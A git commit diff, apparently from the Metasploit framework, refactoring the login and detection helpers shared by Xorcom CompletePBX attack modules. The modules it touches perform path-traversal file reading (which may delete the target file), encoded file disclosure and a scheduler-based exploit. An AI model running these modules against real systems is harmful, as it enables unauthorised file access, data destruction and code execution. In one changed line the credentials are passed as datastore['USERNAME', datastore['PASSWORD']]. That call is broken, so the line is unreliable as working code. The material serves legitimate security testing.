refactor(xorcom): rename helper to completepbx? + pass creds to completepbx_login

Chocapikk · Chocapikk · commit 7ddae3ec3f98 · 2025-07-16T21:48:34.000+02:00
diff --git a/lib/msf/core/exploit/remote/http/xorcom_completepbx.rb b/lib/msf/core/exploit/remote/http/xorcom_completepbx.rb
@@ -9,7 +9,7 @@ module HTTP
         module XorcomCompletePBX
           # Probe root page and return appropriate CheckCode
           # @return [Msf::Exploit::CheckCode]
-          def is_completepbx
+          def completepbx?
             vprint_status('Checking if the target is running CompletePBX...')
             res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')
             return Exploit::CheckCode::Unknown('No response from target.') unless res
@@ -25,30 +25,29 @@ def is_completepbx
             Exploit::CheckCode::Safe('Target does not appear to be running CompletePBX.')
           end
 
-          # Authenticate with supplied USERNAME/PASSWORD and return session cookie
-          # @return [String] the "sid=..." cookie value
+          # Authenticate with supplied credentials and return the session cookie.
+          #
+          # @param username [String] CompletePBX username
+          # @param password [String] CompletePBX password
+          # @return [String]         the "sid=..." cookie value
           # @raise  [Msf::Exploit::Failure] on authentication failure
-          def completepbx_login
-            vprint_status("Attempting authentication with username: #{datastore['USERNAME']}")
+          #
+          def completepbx_login(username, password)
+            vprint_status("Attempting authentication with username: #{username}")
+
             res = send_request_cgi(
               'uri' => normalize_uri(target_uri.path, 'login'),
               'method' => 'POST',
               'ctype' => 'application/x-www-form-urlencoded',
-              'vars_post' => {
-                'userid' => datastore['USERNAME'],
-                'userpass' => datastore['PASSWORD']
-              }
+              'vars_post' => { 'userid' => username, 'userpass' => password }
             )
             unless res&.code == 200
               vprint_error('Authentication failed')
               fail_with(Failure::NoAccess, 'Authentication failed')
             end
 
             sid = res.get_cookies.scan(/sid=[a-f0-9]+/).first
-            unless sid
-              vprint_error('No session ID received')
-              fail_with(Failure::NoAccess, 'No session ID received')
-            end
+            fail_with(Failure::NoAccess, 'No session ID received') unless sid
 
             vprint_good("Authentication successful! Session ID: #{sid}")
             sid
diff --git a/modules/auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read.rb b/modules/auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read.rb
@@ -57,7 +57,7 @@ def initialize(info = {})
   end
 
   def check
-    is_completepbx
+    completepbx?
   end
 
   def run
@@ -77,7 +77,7 @@ def run
     print_warning('This exploit WILL delete the target file if permissions allow.')
     sleep(2)
 
-    sid_cookie = completepbx_login
+    sid_cookie = completepbx_login(datastore['USERNAME', datastore['PASSWORD']])
     target_file = "../../../../../../../../../../../#{datastore['TARGETFILE']}"
 
     print_status("Attempting to read file: #{target_file}")
diff --git a/modules/auxiliary/scanner/http/xorcom_completepbx_file_disclosure.rb b/modules/auxiliary/scanner/http/xorcom_completepbx_file_disclosure.rb
@@ -52,11 +52,11 @@ def initialize(info = {})
   end
 
   def check
-    is_completepbx
+    completepbx?
   end
 
   def run
-    sid_cookie = completepbx_login
+    sid_cookie = completepbx_login(datastore['USERNAME'], datastore['PASSWORD'])
     encoded_path = ',' + Rex::Text.encode_base64(datastore['TARGETFILE'])
 
     print_status("Attempting to read file: #{datastore['TARGETFILE']} (Encoded as: #{encoded_path})")
diff --git a/modules/exploits/linux/http/xorcom_completepbx_scheduler.rb b/modules/exploits/linux/http/xorcom_completepbx_scheduler.rb
@@ -62,7 +62,7 @@ def initialize(info = {})
   end
 
   def check
-    is_completepbx
+    completepbx?
   end
 
   def get_latest_task_id(sid_cookie, task_desc)
@@ -174,7 +174,7 @@ def delete_task(sid_cookie, task_id)
   end
 
   def exploit
-    sid_cookie = completepbx_login
+    sid_cookie = completepbx_login(datastore['USERNAME'], datastore['PASSWORD'])
     task_desc = create_task(sid_cookie)
     task_id = get_latest_task_id(sid_cookie, task_desc)
     run_task(sid_cookie, task_id)
